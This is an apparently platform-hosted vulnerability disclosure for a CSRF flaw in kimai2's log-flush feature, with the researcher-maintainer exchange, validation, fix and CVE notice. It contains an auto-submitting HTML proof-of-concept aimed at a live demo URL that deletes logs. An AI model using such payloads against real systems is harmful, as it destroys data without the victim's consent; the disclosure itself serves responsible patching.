Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2

Valid

Reported on

Nov 8th 2021


Description

cross site request forgery vulnerability is present in delete functionality of doctor feature.

Proof of Concept

<html>

<body>

<script>history.pushState('', '', '/')</script>

<form action="https://demo-stable.kimai.org/de_CH/doctor/flush-log">

  <input type="submit" value="Submit request" />

</form>

<script> document.forms[0].submit(); </script>

</body> </html>

Impact

This vulnerability is capable of delete the existing logs

We are processing your report and will contact the kevinpapst/kimai2 team within 24 hours. a month ago
We have contacted a member of the kevinpapst/kimai2 team and are waiting to hear back 25 days ago
Kevin Papst
25 days ago

Maintainer


I don't understand that report, can you please explain what exactly is the issue.

Asura-N modified their report
24 days ago
Asura-N
24 days ago

Researcher


Hi kevin, its weird actually, when i was submit this report , There is a delete icon in Logfile functionality in doctor module , which is having get method and no csrf protection. now it is not shown that.

When i plan to write a report 2 week ago same thing happen, the delete icon is there in one day and it is not shown in very next day.

https://github.com/kevinpapst/kimai2/blob/master/templates/doctor/index.html.twig#L83

Kevin Papst
24 days ago

Maintainer


The delete icon flushes the application logs, which are only visible to the system administrator. You can "echo 'foo' > var/log/prod.log" to show the icon again.

Asura-N
24 days ago

Researcher


ok, flush log functionality is not having csrf token

Asura-N
24 days ago

Researcher


it is possible to perform csrf attack on flush logs.

Thanks Asura-N

We have sent a follow up to the kevinpapst/kimai2 team. We will try again in 7 days. 22 days ago
Kevin Papst validated this vulnerability 20 days ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Papst
20 days ago

Maintainer


Valid CSRF, even though no risk factor.

Thanks for sharing @Asura-N

Kevin Papst submitted a
20 days ago
Kevin Papst confirmed that a fix has been merged on 6b4953 20 days ago
Kevin Papst has been awarded the fix bounty
DoctorController.php#L59 has been validated
Jamie Slome
15 days ago

Admin


CVE published! 🎊